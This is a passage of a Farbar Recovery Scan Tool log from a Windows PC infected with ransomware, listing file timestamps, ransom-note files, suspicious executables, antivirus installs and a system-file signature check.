00:59 - 2014-09-23 13:09 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\vlc 2014-09-18 23:41 - 2014-09-18 23:45 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox 2014-09-18 17:39 - 2014-09-18 17:39 - 00008176 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML 2014-09-18 17:39 - 2014-09-18 17:39 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL 2014-09-17 08:48 - 2014-09-17 16:14 - 00023552 _____ () C:\ProgramData\893686b8 2014-09-17 08:48 - 2014-09-17 16:14 - 00020954 _____ () C:\Users\Kulle\AppData\Local\893686b8 2014-09-16 04:09 - 2014-09-21 22:08 - 00001560 _____ () C:\Users\Kulle\Desktop\grpconv.txt 2014-09-11 10:06 - 2014-09-11 10:06 - 00146352 _____ (Tim Kosse) C:\Users\Kulle\AppData\Roaming\poumel.exe 2014-09-07 19:12 - 2014-09-16 05:02 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-09-01 02:37 - 2014-09-01 02:36 - 06052529 _____ (Tim Kosse) C:\Users\Kulle\Downloads\FileZilla_3.9.0.3_win32-setup.exe ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 
2014-09-23 13:35 - 2014-09-23 13:34 - 00029241 _____ () C:\Users\Kulle\Desktop\FRST.txt 2014-09-23 13:34 - 2014-09-23 13:33 - 00000000 ____D () C:\FRST 2014-09-23 13:34 - 2012-12-03 17:25 - 00000000 ____D () C:\Users\Kulle\AppData\Local\CrashDumps 2014-09-23 13:31 - 2014-09-23 13:31 - 02106368 _____ (Farbar) C:\Users\Kulle\Desktop\FRST64.exe 2014-09-23 13:24 - 2014-02-03 11:56 - 00000582 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2997053151-1021370575-3583938921-1001.job 2014-09-23 13:18 - 2012-12-03 16:36 - 01554528 _____ () C:\Windows\WindowsUpdate.log 2014-09-23 13:09 - 2014-09-19 00:59 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\vlc 2014-09-23 13:06 - 2012-12-03 18:04 - 00000916 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-09-23 13:05 - 2012-07-26 00:59 - 00000000 ____D () C:\Windows\CbsTemp 2014-09-23 13:04 - 2014-09-23 13:04 - 00015872 _____ () C:\Users\Kulle\Desktop\DECRYPTED-file.xls 2014-09-23 12:55 - 2012-11-09 02:14 - 00000000 ____D () C:\Program Files (x86)\Dell Backup and Recovery 2014-09-23 12:52 - 2014-09-22 13:29 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-09-23 12:52 - 2012-12-03 16:44 - 00003598 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-23 12:48 - 2014-09-23 02:43 - 00003208 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-23 12:48 - 2014-09-22 16:49 - 00003342 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-23 12:47 - 2013-05-25 17:49 - 00000474 _____ () C:\Windows\SysWOW64\BOT.log 2014-09-23 12:47 - 2012-12-03 18:04 - 00000912 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-09-23 12:46 - 2013-05-25 17:49 - 00000151 _____ () C:\Windows\SysWOW64\AS_Storage.log 2014-09-23 12:46 - 2012-11-09 03:59 - 00000000 ____D () 
C:\ProgramData\NVIDIA 2014-09-23 12:46 - 2012-07-26 00:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-09-23 11:00 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\sru 2014-09-23 04:38 - 2014-09-22 02:16 - 00004924 _____ () C:\Users\Kulle\Desktop\9-21.txt 2014-09-23 03:54 - 2014-09-23 03:54 - 00000000 ___RD () C:\Users\Kulle\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices 2014-09-23 03:50 - 2014-09-22 02:31 - 00003364 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-23 03:50 - 2014-09-22 02:31 - 00003230 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-23 02:25 - 2012-11-09 03:57 - 01646330 _____ () C:\Windows\PFRO.log 2014-09-23 02:17 - 2014-09-23 02:17 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\AVAST Software 2014-09-23 02:17 - 2014-09-23 02:13 - 00004182 _____ () C:\Windows\System32\Tasks\avast! Emergency Update 2014-09-23 02:14 - 2014-09-23 02:14 - 00001928 _____ () C:\Users\Public\Desktop\avast! 
Free Antivirus.lnk 2014-09-23 02:14 - 2014-09-23 02:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast 2014-09-23 02:13 - 2014-09-23 02:13 - 00427360 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 01041168 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00307344 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe 2014-09-23 02:12 - 2014-09-23 02:13 - 00224896 _____ () C:\Windows\system32\Drivers\aswVmm.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00093568 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00092008 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00079184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00065776 _____ () C:\Windows\system32\Drivers\aswRvrt.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00029208 _____ () C:\Windows\system32\Drivers\aswHwid.sys 2014-09-23 02:12 - 2014-09-23 02:12 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr 2014-09-23 02:11 - 2014-09-23 02:11 - 00000000 ____D () C:\Program Files\AVAST Software 2014-09-23 02:11 - 2014-09-21 16:11 - 00000000 ____D () C:\ProgramData\AVAST Software 2014-09-23 02:10 - 2014-09-23 02:10 - 04862664 _____ (AVAST Software) C:\Users\Kulle\Downloads\avast_free_antivirus_setup_online.exe 2014-09-22 19:36 - 2012-07-26 00:28 - 00006990 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-09-22 18:28 - 2014-09-22 18:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation 2014-09-22 18:27 - 2014-09-22 18:27 - 00000000 ____D () C:\Users\Kulle\AppData\Local\NVIDIA 2014-09-22 18:19 - 2012-07-26 00:21 - 00028701 _____ () C:\Windows\setupact.log 2014-09-22 18:17 - 2012-12-03 16:35 - 00000000 ____D () C:\Users\Kulle 2014-09-22 18:17 - 2012-11-09 03:58 - 00000000 ____D () 
C:\ProgramData\NVIDIA Corporation 2014-09-22 18:17 - 2012-11-09 03:58 - 00000000 ____D () C:\Program Files\NVIDIA Corporation 2014-09-22 18:17 - 2012-11-09 03:58 - 00000000 ____D () C:\Program Files (x86)\NVIDIA Corporation 2014-09-22 18:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\Windows\ToastData 2014-09-22 18:11 - 2014-09-22 18:11 - 00002182 _____ () C:\Users\Kulle\Desktop\Malwarebytes Anti-Malware Premium.txt 2014-09-22 18:08 - 2014-09-22 13:29 - 00001068 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-09-22 18:08 - 2014-09-22 13:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-09-22 18:08 - 2014-09-22 13:28 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-09-22 18:07 - 2014-09-22 18:07 - 17291904 _____ (Malwarebytes Corporation ) C:\Users\Kulle\Downloads\mbam_premium.exe 2014-09-22 17:08 - 2013-03-14 03:04 - 00000000 ____D () C:\Program Files\Microsoft Silverlight 2014-09-22 17:08 - 2013-03-14 03:04 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight 2014-09-22 16:55 - 2014-09-22 16:55 - 00000000 ____D () C:\Program Files\Common Files\DESIGNER 2014-09-22 16:55 - 2013-03-14 03:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2014-09-22 16:44 - 2014-09-22 16:44 - 00000000 ___SD () C:\Windows\system32\CompatTel 2014-09-22 16:44 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\WinStore 2014-09-22 16:40 - 2013-08-14 18:49 - 00000000 ____D () C:\Windows\system32\MRT 2014-09-22 16:13 - 2014-09-22 16:13 - 00456864 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-09-22 15:50 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility 2014-09-22 15:50 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility 2014-09-22 15:49 - 2012-07-26 01:12 - 00000000 ____D () 
C:\Windows\system32\SecureBootUpdates 2014-09-22 15:49 - 2012-07-26 00:52 - 00000000 ____D () C:\Program Files\Windows Journal 2014-09-22 13:47 - 2014-09-22 01:05 - 00000000 __SHD () C:\ProgramData\USB Adapter Updater 2014-09-22 13:47 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\Web 2014-09-22 13:46 - 2014-09-22 13:46 - 00005100 _____ () C:\Users\Kulle\Desktop\Malwarebytes Anti-Malware.txt 2014-09-22 13:28 - 2014-09-22 13:28 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-09-22 13:15 - 2014-09-22 13:15 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Kulle\Downloads\mbam-setup-2.0.2.1012.exe 2014-09-22 03:09 - 2012-07-25 22:26 - 00262144 ___SH () C:\Windows\system32\config\BBI 2014-09-21 23:47 - 2014-09-21 23:47 - 00008178 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.HTML 2014-09-21 23:47 - 2014-09-21 23:47 - 00008178 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.HTML 2014-09-21 23:47 - 2014-09-21 23:47 - 00004134 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.TXT 2014-09-21 23:47 - 2014-09-21 23:47 - 00004134 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.TXT 2014-09-21 23:47 - 2014-09-21 23:47 - 00000254 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.URL 2014-09-21 23:47 - 2014-09-21 23:47 - 00000254 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.URL 2014-09-21 23:47 - 2013-09-18 16:05 - 00000000 ___RD () C:\Users\Kulle\Dropbox 2014-09-21 23:47 - 2013-08-04 23:19 - 00000000 ___RD () C:\Users\Kulle\Google Drive 2014-09-21 23:47 - 2013-05-25 17:33 - 00000000 ____D () C:\Users\Kulle\Downloads\roxio.creator.2012.pro.en 2014-09-21 23:47 - 2012-12-02 16:30 - 00000000 ____D () C:\Users\Kulle\Documents\Work 2014-09-21 23:42 - 2012-12-04 14:31 - 00000000 ____D () C:\Users\Kulle\Documents\Visual Studio 2012 2014-09-21 23:42 - 2012-12-03 17:27 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe 2014-09-21 23:42 - 2012-12-02 16:30 - 00000000 ____D () C:\Users\Kulle\Documents\Visual Studio 2010 
2014-09-21 23:42 - 2012-12-02 16:27 - 00000000 ____D () C:\Users\Kulle\Documents\UCI Extension 2014-09-21 23:39 - 2013-05-26 16:21 - 00000000 ____D () C:\Users\Kulle\Documents\Transferred from Compaq 2014-09-21 23:38 - 2012-12-04 02:29 - 00000000 ____D () C:\Users\Kulle\Documents\Technical 2014-09-21 23:33 - 2013-03-19 14:14 - 00000000 ____D () C:\Users\Kulle\Documents\Schedules 2014-09-21 23:33 - 2012-12-11 02:27 - 00000000 ____D () C:\Users\Kulle\Documents\SQL Server Management Studio 2014-09-21 23:33 - 2012-12-02 16:26 - 00000000 ____D () C:\Users\Kulle\Documents\Tax Data 2014-09-21 23:33 - 2012-12-02 16:26 - 00000000 ____D () C:\Users\Kulle\Documents\Symantec 2014-09-21 23:33 - 2012-12-02 16:23 - 00000000 ____D () C:\Users\Kulle\Documents\Scanned 2014-09-21 23:27 - 2012-12-02 16:23 - 00000000 ____D () C:\Users\Kulle\Documents\ReVoice 2014-09-21 23:26 - 2012-12-02 16:22 - 00000000 ____D () C:\Users\Kulle\Documents\Recipes 2014-09-21 23:26 - 2012-12-02 16:22 - 00000000 ____D () C:\Users\Kulle\Documents\Receipts 2014-09-21 23:26 - 2012-12-02 16:22 - 00000000 ____D () C:\Users\Kulle\Documents\Quickbooks Exports 2014-09-21 23:26 - 2012-12-02 16:22 - 00000000 ____D () C:\Users\Kulle\Documents\Product Manuals 2014-09-21 23:25 - 2012-12-02 16:21 - 00000000 ____D () C:\Users\Kulle\Documents\Print Shop Projects 2014-09-21 23:24 - 2014-06-13 02:47 - 00000000 ____D () C:\Users\Kulle\Documents\Places of Interest 2014-09-21 23:24 - 2013-05-26 00:11 - 00000000 ____D () C:\Users\Kulle\Documents\Outlook Files 2014-09-21 23:24 - 2012-12-02 16:21 - 00000000 ____D () C:\Users\Kulle\Documents\Paper Models 2014-09-21 23:23 - 2012-12-14 23:35 - 00000000 ___SD () C:\Users\Kulle\Documents\My Data Sources 2014-09-21 23:23 - 2012-12-02 16:20 - 00000000 ____D () C:\Users\Kulle\Documents\News Articles 2014-09-21 23:23 - 2012-12-02 16:18 - 00000000 ____D () C:\Users\Kulle\Documents\My Web Sites 2014-09-21 23:13 - 2012-12-02 15:22 - 00000000 ____D () C:\Users\Kulle\Documents\Movies 
2014-09-21 23:13 - 2012-12-02 14:55 - 00000000 ____D () C:\Users\Kulle\Documents\Miscellaneous 2014-09-21 23:11 - 2012-12-02 14:55 - 00000000 ____D () C:\Users\Kulle\Documents\Medical 2014-09-21 23:11 - 2012-12-02 14:55 - 00000000 ____D () C:\Users\Kulle\Documents\Maps & Seating Charts 2014-09-21 23:10 - 2012-12-04 02:23 - 00000000 ____D () C:\Users\Kulle\Documents\Lists 2014-09-21 22:52 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Letters 2014-09-21 22:51 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Labels 2014-09-21 22:51 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Itemizations 2014-09-21 22:42 - 2012-12-02 14:39 - 00000000 ____D () C:\Users\Kulle\Documents\Garden Grove Journal 2014-09-21 22:42 - 2012-12-02 14:39 - 00000000 ____D () C:\Users\Kulle\Documents\Forms 2014-09-21 22:42 - 2012-12-02 02:01 - 00000000 ____D () C:\Users\Kulle\Documents\Finances 2014-09-21 22:37 - 2012-12-02 16:36 - 00000000 ____D () C:\Users\Kulle\Documents\Ema 2014-09-21 22:37 - 2012-12-02 16:35 - 00000000 ____D () C:\Users\Kulle\Documents\Driver Download CD for Dell 2014-09-21 22:37 - 2012-12-02 02:01 - 00000000 ____D () C:\Users\Kulle\Documents\Faxes 2014-09-21 22:37 - 2012-12-02 02:01 - 00000000 ____D () C:\Users\Kulle\Documents\Envelopes 2014-09-21 22:37 - 2012-12-02 02:01 - 00000000 ____D () C:\Users\Kulle\Documents\EML Copies for eBay Dispute 2014-09-21 22:35 - 2012-12-05 03:07 - 00000000 ____D () C:\Users\Kulle\Documents\CyberLink 2014-09-21 22:35 - 2012-12-02 16:34 - 00000000 ____D () C:\Users\Kulle\Documents\Condo Search 2014-09-21 22:35 - 2012-01-30 04:50 - 00001560 _____ () C:\Users\Kulle\Documents\continue.txt 2014-09-21 22:34 - 2012-12-02 16:32 - 00000000 ____D () C:\Users\Kulle\Documents\CD Factory 2014-09-21 22:33 - 2012-12-02 16:32 - 00000000 ____D () C:\Users\Kulle\Documents\Audio Clips 2014-09-21 22:33 - 2012-12-02 16:30 - 00000000 ____D () C:\Users\Kulle\Documents\Activities 2014-09-21 22:08 - 2014-09-21 22:08 - 
00008178 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.HTML 2014-09-21 22:08 - 2014-09-21 22:08 - 00008178 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.HTML 2014-09-21 22:08 - 2014-09-21 22:08 - 00004134 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.TXT 2014-09-21 22:08 - 2014-09-21 22:08 - 00004134 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.TXT 2014-09-21 22:08 - 2014-09-21 22:08 - 00000254 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.URL 2014-09-21 22:08 - 2014-09-21 22:08 - 00000254 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.URL 2014-09-21 22:08 - 2014-09-19 04:05 - 00000792 _____ () C:\Users\Kulle\Desktop\Frequent Pages Listed on New Tab.txt 2014-09-21 22:08 - 2014-09-16 04:09 - 00001560 _____ () C:\Users\Kulle\Desktop\grpconv.txt 2014-09-21 22:08 - 2014-08-15 21:46 - 00013080 _____ () C:\Users\Kulle\Desktop\URLs for Tork.txt 2014-09-21 22:08 - 2014-05-29 03:31 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\RealNetworks 2014-09-21 22:08 - 2014-04-24 14:07 - 00000000 ____D () C:\Users\Kulle\Documents\20140608 Carl’s Jr_® Caramel Shake_files 2014-09-21 22:08 - 2013-07-28 17:21 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\Samsung 2014-09-21 22:08 - 2012-12-08 14:26 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\Real 2014-09-21 22:08 - 2012-12-06 23:47 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\TeamViewer 2014-09-21 19:25 - 2013-09-09 15:14 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\Mozilla 2014-09-21 19:14 - 2014-05-17 01:27 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\Corel 2014-09-21 19:14 - 2013-07-22 17:25 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\Dropbox 2014-09-21 19:11 - 2014-09-21 19:11 - 00008178 _____ () C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.HTML 2014-09-21 19:11 - 2014-09-21 19:11 - 00004134 _____ () C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.TXT 2014-09-21 19:11 - 2014-09-21 19:11 - 00000254 _____ () 
C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.URL 2014-09-21 19:11 - 2013-04-02 16:24 - 00000000 ____D () C:\Users\Kulle\AppData\Local\webkit 2014-09-21 19:11 - 2012-12-03 16:37 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Power2Go8 2014-09-21 17:53 - 2013-08-30 13:49 - 00000000 ____D () C:\ProgramData\iolo 2014-09-21 17:50 - 2014-09-21 17:50 - 00001447 _____ () C:\Users\Kulle\Desktop\LiveBoost.lnk 2014-09-21 17:50 - 2014-01-02 12:28 - 00003144 _____ () C:\Windows\System32\Tasks\iolo Process Governor 2014-09-21 17:50 - 2014-01-02 12:28 - 00000000 ____D () C:\ProgramData\ioloGovernor 2014-09-21 17:50 - 2013-08-30 16:05 - 00001443 _____ () C:\Users\Kulle\Desktop\System Mechanic Professional.lnk 2014-09-21 17:50 - 2013-08-30 16:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Mechanic Professional 2014-09-21 17:50 - 2013-08-30 13:49 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\iolo 2014-09-21 12:51 - 2014-09-21 12:51 - 1944573530 _____ () C:\Windows\MEMORY.DMP 2014-09-21 12:51 - 2014-09-21 12:51 - 00296792 _____ () C:\Windows\Minidump\092114-38125-01.dmp 2014-09-21 12:51 - 2013-09-22 22:20 - 00000000 ____D () C:\Windows\Minidump 2014-09-20 22:49 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Internet Windows & Goodies 2014-09-20 22:49 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Internet Video Clips 2014-09-20 22:49 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Internet Games 2014-09-20 22:49 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Internet Cartoons & Animation 2014-09-20 22:49 - 2012-12-02 14:46 - 00000000 ____D () C:\Users\Kulle\Documents\Internet Audio Clips 2014-09-20 22:49 - 2012-12-02 14:46 - 00000000 ____D () C:\Users\Kulle\Documents\Insurance, Auto 2014-09-20 22:49 - 2012-12-02 14:39 - 00000000 ____D () C:\Users\Kulle\Documents\HTML Docs 2014-09-20 19:55 - 2012-12-14 15:56 - 00000000 ____D () C:\Users\Kulle\AppData\Local\join.me 
2014-09-20 19:54 - 2014-05-29 03:30 - 00000000 ____D () C:\ProgramData\RealNetworks 2014-09-20 19:54 - 2013-10-21 15:38 - 00000000 ____D () C:\ProgramData\Wondershare Application Common Data 2014-09-20 19:54 - 2012-12-08 03:46 - 00000000 ____D () C:\ProgramData\Real 2014-09-20 19:53 - 2012-12-22 14:17 - 00000000 ____D () C:\ProgramData\Broderbund Software 2014-09-20 15:54 - 2012-12-10 02:54 - 00000000 ____D () C:\inetpub 2014-09-20 15:51 - 2012-11-09 02:11 - 00000000 ____D () C:\ProgramData\install_clap 2014-09-20 00:39 - 2014-02-03 11:56 - 00003584 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-19 02:07 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\NDF 2014-09-18 23:52 - 2013-09-09 15:13 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service 2014-09-18 23:51 - 2014-07-31 03:43 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox.bak 2014-09-18 23:45 - 2014-09-18 23:41 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox 2014-09-18 20:28 - 2012-07-25 19:16 - 00000000 __SHD () C:\Users\Kulle\AppData\Roaming\ihadtvwv 2014-09-18 17:48 - 2012-12-03 18:04 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Google 2014-09-18 17:45 - 2013-09-10 13:01 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Citrix 2014-09-18 17:45 - 2012-12-05 03:07 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Cyberlink 2014-09-18 17:43 - 2013-04-27 18:22 - 00000000 ____D () C:\Users\Kulle\AppData\Local\autorun 2014-09-18 17:43 - 2012-12-22 14:22 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Broderbund Software 2014-09-18 17:42 - 2012-12-14 20:16 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Apple Computer 2014-09-18 17:39 - 2014-09-18 17:39 - 00008176 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML 2014-09-18 17:39 - 2014-09-18 17:39 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL 2014-09-18 17:39 - 2013-06-21 16:21 - 00001408 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT.zuknxtk 
2014-09-17 16:14 - 2014-09-17 08:48 - 00023552 _____ () C:\ProgramData\893686b8 2014-09-17 16:14 - 2014-09-17 08:48 - 00020954 _____ () C:\Users\Kulle\AppData\Local\893686b8 2014-09-17 07:56 - 2012-12-06 21:47 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Deployment 2014-09-16 19:57 - 2013-03-22 01:20 - 00000000 ____D () C:\Delete 2014-09-16 05:02 - 2014-09-07 19:12 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-09-16 04:16 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\AUInstallAgent 2014-09-11 10:06 - 2014-09-11 10:06 - 00146352 _____ (Tim Kosse) C:\Users\Kulle\AppData\Roaming\poumel.exe 2014-09-04 23:07 - 2012-12-05 03:07 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\CyberLink 2014-09-04 15:36 - 2014-09-19 03:27 - 00755712 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll 2014-09-02 18:49 - 2014-09-19 03:27 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll 2014-09-02 12:32 - 2013-05-19 03:16 - 00705480 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2014-09-02 12:32 - 2013-05-19 03:16 - 00104904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2014-09-01 15:41 - 2013-02-28 12:42 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\FileZilla 2014-09-01 04:25 - 2013-02-28 12:54 - 00000600 _____ () C:\Users\Kulle\AppData\Local\PUTTY.RND 2014-09-01 02:37 - 2013-02-28 12:42 - 00001966 _____ () C:\Users\Public\Desktop\FileZilla Client.lnk 2014-09-01 02:37 - 2013-02-28 12:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client 2014-09-01 02:37 - 2013-02-28 12:42 - 00000000 ____D () C:\Program Files (x86)\FileZilla FTP Client 2014-09-01 02:36 - 2014-09-01 02:37 - 06052529 _____ (Tim Kosse) C:\Users\Kulle\Downloads\FileZilla_3.9.0.3_win32-setup.exe 2014-08-29 22:48 - 2014-09-22 18:14 - 10115072 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll 2014-08-29 22:47 - 2014-09-22 18:14 - 02885632 _____ (Microsoft 
Corporation) C:\Windows\system32\msi.dll 2014-08-29 22:46 - 2014-09-22 18:14 - 02306560 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll 2014-08-29 21:05 - 2014-09-22 18:14 - 08858112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll 2014-08-29 21:04 - 2014-09-22 18:14 - 02416128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll 2014-08-29 21:03 - 2014-09-22 18:14 - 02037760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll 2014-08-29 13:01 - 2012-12-13 04:18 - 101694776 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe 2014-08-28 04:34 - 2014-09-22 16:24 - 00059400 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe 2014-08-27 23:05 - 2014-09-22 16:24 - 00630272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll 2014-08-27 23:05 - 2014-09-22 16:24 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll 2014-08-27 23:05 - 2014-09-22 16:24 - 00086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll 2014-08-27 23:05 - 2014-09-22 16:24 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe 2014-08-27 23:02 - 2014-09-22 16:24 - 00040448 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe 2014-08-27 23:01 - 2014-09-22 16:24 - 03285504 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 01623552 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 00253440 _____ (Microsoft Corporation) C:\Windows\system32\WUSettingsProvider.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 00100352 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll 
2014-08-27 23:01 - 2014-09-22 16:24 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\wuaext.dll 2014-08-26 02:06 - 2013-07-29 01:32 - 00000000 ____D () C:\Users\Kulle\Downloads\14aren ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-09-08 08:42 